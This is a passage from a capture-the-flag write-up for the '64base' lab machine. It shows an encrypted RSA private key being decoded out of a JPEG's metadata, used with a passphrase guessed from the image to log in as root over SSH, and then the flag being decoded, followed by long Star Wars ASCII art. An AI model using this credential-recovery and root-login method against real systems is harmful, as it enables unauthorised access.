956566834566b31756232494b643168535a6a56435930644c56546b330a65475276636c59795648457261446c4c553278615a5463354f58527956484a475230356c4d4456326545527961576f315658517953324e52654373354f457334533342585441706e645570510a556c424c52326c71627a6b3253455248597a4e4d4e566c7a65453969566d63724c325a714d4546326330746d636d4e574c327834595663725357313562574d7854566870536b316962554e360a62455233436c52425632316863577453526b52355154464956585a30646c4e6c566e46544d533949616d6845647a6c6b4e45747a646e4e71613270326557565256484e7a5a6e4e6b52324e560a4d47684561316833556c647a6332514b4d6d517a5279744f616d3078556a56615445356e556d784f63465a48616d684c517a524263325a59557a4e4b4d486f7964444e4355453035576b39430a54554a6c4f5552344f4870744e58684757546c365633527964677042523342794d454a6f4f45745264323177616c4656597a46685a6e4e78595646594d465649546b7859564446615431644c0a616d63305530457a57454d355a454e4665555a784d464e4a65464671547a6c4d52304e48436a52524e57356a5a6c566f62585a3063586c3164454e7362444a6b5746427a57465a455a54526c0a6230517851327432536b354557544e4c554663725232744f4f5577724f554e516554677252453531626b5a4a6433674b4b3151724b7a64525a7939315546684c6354524e4e6a464a555467770a4d7a52566148565356314d30564846514f57463657444e44527a6c4d65573970516a5a57596b74505a555233546a68686157784d533170436377706d57546c524e6b464e4d584e3562476c360a53444675626e684c5433526155566431636e68715230704353584d324d6e526c6245317259584d356555354e617a4e4d64546478556b6732633364504f584e6b56454a70436974714d4867300a64555261616b706a5a30315965475a694d4863315154593062466c4763303153656b5a714e31686b5a6e6b784f53744e5a54684b525768524f45744f57455233555574456556564d526b39550a63336f4b4d544e575a6b4a4f65466c7a65557731656b6459546e703563566f3053533950547a644e5a575179616a4248656a426e4d6a4670534545764d445a74636e4d795932786b637a5a540a56554a4852585a754f4535705667707955334a494e6e5a46637a5254656d63776544686b5a45643255544278567a463254577455556e557a54336b765a544577526a63304e586845545546550a53314a7353316f32636c6c4954554e34536a4e4a59323530436b56364d45394e57466c6b517a5a4461555976535664305a3252564b32684c65585a7a4e484e4764454e4359327854595764740a5246524b4d6d74615a485530556c4a3357565a574e6d394a546e6f35596e4250646b554b556e677a534656785a6d354c553268796458704e4f56707261556c7264564e6d556e526d615531320a596c52365a6d5a4b56464d30597a513451303831574339535a5559765157464e654774695532524654305a7a53517047646a6c595a476b355532524f6458684853455579527a5249646b706b0a53584279526c5679566c4e7755306b344d48646e636d49794e44567a647a5a6e5647397064466f354d47684b4e47354b4e5746354e304648436c6c7059574531627a63344e7a63765a6e63320a57566f764d6c557a5155526b61564e50516d3072614770574d6b705765484a7665565659596b63315a475a734d32303452335a6d4e7a464b4e6a4a4753484534646d6f4b63557068626c4e720a4f4445334e586f77596d70795746646b5445637a52464e735355707063327851567974355247466d4e316c43566c6c33563149725645457861304d326157564a5154563056544e776269394a0a4d776f324e466f31625842444b3364785a6c52345232646c51334e6e53577335646c4e754d6e41765a5756305a456b7a5a6c46584f46645952564a69524756304d56564d5346427864456c700a4e314e61596d6f3464697451436d5a7553457852646b563353584d72516d59785133424c4d554672576d565654564a4655577443614552704e7a4a49526d4a334d6b6376656e46306153395a0a5a4735786545463562445a4d576e704a5a5646754f48514b4c3064714e477468636b6f78615530355357597a4f57524e4e55396851315a615569395554304a575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d56424c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b744c5330744c516f3d0a Image Width : 960 Image Height : 720 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1) Image Size : 960x720 Megapixels : 0.691 eric@geoda:/tmp$
I then take the contents of the Comment field and run xxd and decode in base64 again:
eric@geoda:/tmp$ echo "4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a626d5a764f69424252564d744d5449344c554e43517977324d6a46424d7a68425155513052546c475155457a4e6a55335130457a4f44673452446c434d7a553251776f4b625552300a556e684a643267304d464a54546b467a4d697473546c4a49646c4d356557684e4b325668654868564e586c795231424461334a6955566376556d64515543745352307043656a6c57636c52720a646c6c334e67705a59303931575756615457707a4e475a4a55473433526c7035536d64345230686f5533685262336857626a6c7252477433626e4e4e546b5270636e526a62304e50617a6c530a524546484e5756344f58673056453136436a684a624552435558453161546c5a656d6f35646c426d656d56435246706b53586f35524863795a323479553246465a335531656d56734b7a5a490a52303969526a686161444e4e53574e6f6554687a4d5668795254414b61335a4d53306b794e544a74656c64334e47746955334d354b31466856336c6f4d7a52724f45704a566e7031597a46520a51336c69656a56586231553157545532527a5a784d564a6b637a426959315a785446567a5a51704e5533704c617a4e745332465851586c4d574778764e3078756258467856555a4c5347356b0a516b557855326851566c5a704e47497752336c475355785054335a3062585a47596a5172656d68314e6d705056316c49436d73796147524453453554644374705a3264354f57686f4d3270680a52576456626c4e51576e56464e30354b6430525a5954646c553052685a3077784e31684c634774744d6c6c70516c5a7956566834566b31756232494b643168535a6a56435930644c56546b330a65475276636c59795648457261446c4c553278615a5463354f58527956484a475230356c4d4456326545527961576f315658517953324e52654373354f457334533342585441706e645570510a556c424c52326c71627a6b3253455248597a4e4d4e566c7a65453969566d63724c325a714d4546326330746d636d4e574c327834595663725357313562574d7854566870536b316962554e360a62455233436c52425632316863577453526b52355154464956585a30646c4e6c566e46544d533949616d6845647a6c6b4e45747a646e4e71613270326557565256484e7a5a6e4e6b52324e560a4d47684561316833556c647a6332514b4d6d517a5279744f616d3078556a56615445356e556d784f63465a48616d684c517a524263325a59557a4e4b4d486f7964444e4355453035576b39430a54554a6c4f5552344f4870744e58684757546c365633527964677042523342794d454a6f4f45745264323177616c4656597a46685a6e4e78595646594d465649546b7859564446615431644c0a616d63305530457a57454d355a454e4665555a784d464e4a65464671547a6c4d52304e48436a52524e57356a5a6c566f62585a3063586c3164454e7362444a6b5746427a57465a455a54526c0a6230517851327432536b354557544e4c554663725232744f4f5577724f554e516554677252453531626b5a4a6433674b4b3151724b7a64525a7939315546684c6354524e4e6a464a555467770a4d7a52566148565356314d30564846514f57463657444e44527a6c4d65573970516a5a57596b74505a555233546a68686157784d533170436377706d57546c524e6b464e4d584e3562476c360a53444675626e684c5433526155566431636e68715230704353584d324d6e526c6245317259584d356555354e617a4e4d64546478556b6732633364504f584e6b56454a70436974714d4867300a64555261616b706a5a30315965475a694d4863315154593062466c4763303153656b5a714e31686b5a6e6b784f53744e5a54684b525768524f45744f57455233555574456556564d526b39550a63336f4b4d544e575a6b4a4f65466c7a65557731656b6459546e703563566f3053533950547a644e5a575179616a4248656a426e4d6a4670534545764d445a74636e4d795932786b637a5a540a56554a4852585a754f4535705667707955334a494e6e5a46637a5254656d63776544686b5a45643255544278567a463254577455556e557a54336b765a544577526a63304e586845545546550a53314a7353316f32636c6c4954554e34536a4e4a59323530436b56364d45394e57466c6b517a5a4461555976535664305a3252564b32684c65585a7a4e484e4764454e4359327854595764740a5246524b4d6d74615a485530556c4a3357565a574e6d394a546e6f35596e4250646b554b556e677a534656785a6d354c553268796458704e4f56707261556c7264564e6d556e526d615531320a596c52365a6d5a4b56464d30597a513451303831574339535a5559765157464e654774695532524654305a7a53517047646a6c595a476b355532524f6458684853455579527a5249646b706b0a53584279526c5679566c4e7755306b344d48646e636d49794e44567a647a5a6e5647397064466f354d47684b4e47354b4e5746354e304648436c6c7059574531627a63344e7a63765a6e63320a57566f764d6c557a5155526b61564e50516d3072614770574d6b705765484a7665565659596b63315a475a734d32303452335a6d4e7a464b4e6a4a4753484534646d6f4b63557068626c4e720a4f4445334e586f77596d70795746646b5445637a52464e735355707063327851567974355247466d4e316c43566c6c33563149725645457861304d326157564a5154563056544e776269394a0a4d776f324e466f31625842444b3364785a6c52345232646c51334e6e53577335646c4e754d6e41765a5756305a456b7a5a6c46584f46645952564a69524756304d56564d5346427864456c700a4e314e61596d6f3464697451436d5a7553457852646b563353584d72516d59785133424c4d554672576d565654564a4655577443614552704e7a4a49526d4a334d6b6376656e46306153395a0a5a4735786545463562445a4d576e704a5a5646754f48514b4c3064714e477468636b6f78615530355357597a4f57524e4e55396851315a615569395554304a575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d56424c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b744c5330744c516f3d0a" | xxd -p -r | base64 -d -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6 YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz 8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0 kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd 2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG 4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx +T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi +j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz 13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3 64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t /Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP -----END RSA PRIVATE KEY----- eric@geoda:/tmp$
Nice! As expected, this was in fact an RSA Private Key!!
I echo this into my authorized_keys file and take away all permissions besides my current user:
eric@geoda:/tmp$ echo "-----BEGIN RSA PRIVATE KEY----- > Proc-Type: 4,ENCRYPTED > DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C > > mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6 > YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz > 8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0 > kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse > MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH > k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob > wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL > guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw > TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd > 2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv > AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG > 4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx > +T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs > fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi > +j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz > 13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV > rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt > Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE > Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI > Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG > Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj > qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3 > 64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P > fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t > /Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP > -----END RSA PRIVATE KEY----- > " > ~/.ssh/authorized_keys eric@geoda:/tmp$ chmod 0400 ~/.ssh/authorized_keys
With my file setup, I try to login with root:
eric@geoda:/tmp$ ssh root@192.168.56.103 -p 62964 -i ~/.ssh/authorized_keys Enter passphrase for key '/home/eric/.ssh/authorized_keys': root@192.168.56.103's password: Permission denied, please try again. root@192.168.56.103's password: Permission denied, please try again. root@192.168.56.103's password: Permission denied (publickey,password). eric@geoda:/tmp$
So close! Looks like it still requires a password. But what's my password? I realized that the file that I copied down was a JPEG and I never actually viewed it.
It's a picture with the words "Use the Force". I bet this is the password! I tried many variations and "usetheforce" was the correct one!
eric@geoda:/tmp$ ssh root@192.168.56.103 -p 62964 -i ~/.ssh/authorized_keys Enter passphrase for key '/home/eric/.ssh/authorized_keys': Last login: Tue Apr 25 18:38:02 2017 from 192.168.56.1 flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK} root@64base:~#
Success! And there's flag6!
flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
The Finale
I try to decode the flag but realize there were many iterations between HEX and base64. I run xxd and base64 -d multiple times until I get the original message:
root@64base:~# echo "NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK" | base64 -d | xxd -r -p | base64 -d | xxd -r -p | base64 -d base64 -d /var/local/.luke|less.real root@64base:~#
It says "base64 -d /var/local/.luke|less.real". I of course do as it says and I'm presented with the finale!
\ \ / / | | | | __ \ \ \ /\ / /__| | | | | | | ___ _ __ ___ \ \/ \/ / _ \ | | | | | |/ _ \| '_ \ / _ \ \ /\ / __/ | | | |__| | (_) | | | | __/ __ \/ _\/ \___|_|_|_|_____/ \___/|_|_|_|\___| _ \ \ / / | __ \(_) | | |_ _| | | | \ \_/ /__ _ _ | | | |_ __| | | | | |_| | \ / _ \| | | | | | | | |/ _` | | | | __| | | | (_) | |_| | | |__| | | (_| | _| |_| |_|_| |_|\___/ \__,_| |_____/|_|\__,_| |_____|\__(_) _____ _ _ _ __ __ __ _ ___ _ __ ___ __ __ __ _ ___ _ _ __ _________ %=x%= | |V| |_)|_ |_) | |_| | |_) |_| (_ |_ |_) | |_| |\| (_ %=x%=x%=x ~~~~~ | | | | |_ | \ | | | |_ |_) | | __) |_ | |_ | | | | __) ~~~~~~~~~ LS .-. .-. .=========. E x t e r i o r , A e r i a l V i e w ||.-.7.-.|| ----------------------------------------- ||`-' `-'|| `=========' `-'| |`-'8 1 .............. Sensor Suite Tower ______ |9| ______ 2 ... Heavy Twin Turbolaser Turrets / /\__| |__/\ \ 3 ............. Heavy Laser Turrets / \_ / / |_| \ \ _/ \ 4 ....... TIE Fighter Launch Chutes /___(\\\/ \///)___\ 5 ............... Heavy Blast Doors \____\\`==========='//____/ 6 .................... Guard towers / '/ .-------. \\ \ 7 ........ Shuttle Landing Platform __/ //. \`+---+'/ .\\ \__ 8 ........... AT-AT Docking Station /\ \ ///x`.\|___|/.'x\\\ / /\ 9 ................. Connecting Ramp / \ \ //`-._//| |\\_.2'\\ / / \ / _.-==='_____//.-=-.\\_____`===-._ \ \ `-===.\-. \ `-=1' / .-/.===-' 3 / The pre-fabricated, multi-function \ / / \\\ \ \.===./ /4/// \ \ / Imperial garrison base is the back- \/_/ \\\ | /.---.\ | /// \_\/ bone of the Empire's occupational \ \\\|/ |_m_| \|/// / forces. These heavily-armoured for- \_____\=============/_____/ tresses have walls up to 10 meters /____/// ___ \\\____\ thick to guard against ground \ (_//\__|||||__/\\_) / assaults, and powerful deflector \ / \|,,|||||,,|/ \ / shields protect them for air or \_____| | 5 | 6|_____/ space attacks. `--' `--' ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ U E x t e r i o r , S i d e V i e w /_\ ------------------------------------- 1 [___] :`:': 1 .............. Sensor Suite Tower `:::' 2 ... Heavy Twin Turbolaser Turrets _ :_: _ 3 ............. Heavy Laser Turrets =[ ]2 [%] [ ]= 4 ....... Tie Fighter Launch Chutes :=: :=: :=: 5 ............... Heavy Blast Doors _|_|_ __| |__ _|_|_ 6 .................... Guard Towers / /XX|\ /__|_|__\ /|XX\ \ 3 /4/XXX| | _/___\_ | |XXX\ \ 7 ....... AT-AT Walker --===____/--===X|_|/_______\|_|X===--\____===-- 8 ........ AT-ST Scout /__| | /l_\\ //_|\ |_|__\ /~~.' | /:' \\ _____ // `:\ | `. \ / | .' / | \\==|||||==// | \ `. | \ 7 8 / .' | / .' | ||5|| 6| `. \ | `. \ xx= _ /____|__|__/__|______l__|||||__l______|__\__|__|____\ ll <~ ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ O u t e r D e f e n s e s | | --------------------------- ^_[]_^ ^_[]_^ |----| 5 |----| 1 ... High Voltage Death Fence ________`-..-'________4________`-..-'______ 2 ....... Perimeter Gate House =========================================== 3 ........ Powered Force Field `||' `||' 4 .......... Fortified Catwalk || ^==^ ^==^ || 5 ......... Observattion tower ___.____._ll_._1_|--| |--|___._ll_.____.____ XXX|XXXX|XIIX|XXX|--| 3 |--|XXX|XIIX|XXXX|XXXX XXX|XXXX|XIIX|XXX| 2| | |XXX|XIIX|XXXX|XXXX The outer perimeter is marked by a high-voltage "death fence." Powered Force fields placed at regular intervals along the fence may be turned off to permit entry and exit. Observation towers, connected by fortified cat- walks, are set back from the fence and constantly manned by stormtroopers. Other outer defenses include energy mine fields, modified patrol Droids, and AT-ST Scout Walkers. ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ /| L a n d i n g P l a t f o r m -==+ ------------------------------- : [__________] Up to two Lambda-class shuttles and four `' || ||`-' AT-AT Walkers can dock at the platform. ======== =xx A loading ramp leads directly from the || || ll platform into the garrison complex. ~~~~~~~~~~~~~~~~~~~~~~ ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I n t e r i o r , L e v e l s 1 - 5 --------------------------------------- ______ ______ The first 5 levels of the garrison com- / ____ \_______/ ____ \ plex are of identical layout, construc- / / \_________/ \ \ ted around a level-spanning surface / / | 3 | 5 \ \ vehicle bay. Refer to the key below to \ \ \_____/_______/ / determine what each level contains. / / o |o o| o \ \ __/ / 2 .' o4o `. 6 \ \__ 1 ... Storage Gallery (levels 1-2), / __/ .' ._o_o_. `. \__ \ Armory (levels 3-4), Training / / `-. .' .' 10 `. `. .-' \ \ Facilities and Recreation / / ~' .'`-._____.-'`. `~ \ \ Rooms (level 5) \ \ o < C | | | D > o 7 / / 2 ... Stormtrooper Barracks (levels \ \__ \ ' ' ' / __/ / 1-3), Security Barracks \__ \ 1 |---- 9 ----|~-._ / __/ (levels 4-5) \ \ |==== B====| Y / 3 ...... Base Security (levels 1-5) \ \ |---- ----| / / 4 ......... Turbolifts (levels 1-6) / / |__A_ _ __| 8 \ \ 5 .... Detention Block (levels 1-5) \ \ | | | | / / 6 ... Technical and Service Person- \ \_____| | | |_____/ / nel Barracks (levels 1-5) \_____ `o| |o' _____/ 7 ... Technical Shops (levels 1-2), `--' `--' Medical Bay (level 3), Science Labs (levels 4-5) 8 ... Storage Gallery (levels 1-2), Droid Shops (levels 3-5) 9 ...................... Surface Vehicle Bay (levels 1-5): A .................................. AT-ST Scout Walker Bays B ........................................ AT-AT Walker Bays C ...................... Vehicle Maintenance and Repair Deck D ........................................ Speeder Bike Deck 10 ........................... Miscellaneous Vehicle Parking ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I n t e r i o r , L e v e l 6 --------------------------------- ____ ____ / __ \_________/ __ \ Base command personnel, control rooms, / / \___________/ \ \ rooms, trade mission, and diplomatic \ \ o oo o / / offices are located on this level. / / oo----. \ \ / / 8 __oo `.1 \ \ 1 ....... Sensor Monitors, Tractor Beam __/ /\ .~ || 2 \ \ \__ and Shield Controls / __/ \ .' 9.-'`-. | /\__ \ 2 ....................... Computer Room / / o \|__: o :_____|/ o \ \ 3 ....................... Meeting Rooms \ \__ 7 .---: 10 :------.3 __/ / 4 ...... Officers' and Pilots' Quarters \__ \ / `-..-' \/ __/ 5 ... Trade Mission, Diplomatic Offices \ \/\ 5 || / / 6 ........... Base Commander's Quarters \ \ `. || 4 / / and offices \ \ o~`---|| o / / 7 ............ Officer Recreation Rooms / /6 ____||_____ \ \ 8 ............................. Offices \ \__/ _________ \__/ / 9 ................... Base Control Room \____/ \____/ 10 ..................... Reception Area ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I n t e r i o r , L e v e l 7 --------------------------------- __ __ /_]\ /[_\ The TIE Fighter Hanger Deck houses the \ \,===========./ / garrison's TIE fighters in standard-design //:o-----------o:\\ ceiling racks. Bases are usually equipped /// X X X X X X \\\ with 30 TIE fighters and five TIE bombers /// X X X_X_X X X \\\ (a single bomber takes up the same rack __/// X X [___] X X \\\__ space as two fighters). Five to 15 ships /\_/o X X 1 &/3\& X X o\_/\ are on constant patrol, depending on the \]_\\ X X <\\_//> //_[/ base's readiness level. \\\ X X \>&</2 X []/// \\\ X X [] X []/// 1 .............. TIE Fighter Ceiling Racks \\\ X [] [] /// (holds up to 40 craft) \\:o-----------o:// 2 ............. Lift Platforms, to Level 8 /_/`==========='\_\ 3 .................. Flight Control Center \_]/ \[_/ X ............................ TIE Fighter [] ............................ TIE Bomber ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I n t e r i o r , L e v e l 8 --------------------------------- (not shown) The Flight Deck contains the tractor beam generators which catapult out- going craft into the open sky and reel in landing ships. Pilots relinquish control of their ships during take off and landing because of the limited maneuvering area within the chutes. ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ S u b - L e v e l I n s t a l l a t i o n s --------------------------------------------- (not shown) A large underground section of the base houses the main power and back-up generators, the tractor beam and deflector shield generators, the environ- ment control station, and the waste disposal and refuse units. Some storage facilities are also located here. ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Version 1.9 (released 941211). Pictures by Lennert Stock (LS), Rowan Crawford (-Row), Ray Brunner, Bob VanderClay and Joe Rumsey. The pictures work best when shown on a white on black screen (except for some faces) with a not too fancy font. Contribu- tions welcome, email to the adress below. Sources LS: The Star Wars Source- book, Star Wars 